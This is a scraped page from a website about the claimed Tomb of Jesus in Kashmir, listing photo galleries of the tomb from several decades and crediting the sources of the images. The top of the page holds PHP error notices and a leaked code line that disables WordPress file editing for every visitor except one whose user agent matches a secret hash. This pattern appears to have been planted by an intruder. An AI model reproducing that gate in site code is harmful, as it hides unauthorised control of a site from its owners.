Notice: Constant FS_CHMOD_DIR already defined in /home/akramkhalid/public_html/ on line 113

Notice: Constant FS_CHMOD_FILE already defined in /home/akramkhalid/public_html/ on line 113
if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Tomb Photos – Tomb of Jesus in India
Tomb of Jesus

Tomb Photos

The following images were taken December 2006 provided by an individual who visited the tomb and was able to take these photos. Photography is generally prohibited in and around the tomb.

Older Photos

The following images are provided to the Tomb of Jesus Website courtesy Ken Lee of Eleven Shadows

Ken visited the tomb in 1997 when he took these images.

The Valley of Kashmir

Photos from 1980s

Inner Chambers Before Glass Walls

Photos from 1930s – 1950s

The following images are taken, with permission, from The Rozabal – Beyond the Da Vinci Code – by Fida Hassnain and Suzanne Olsson

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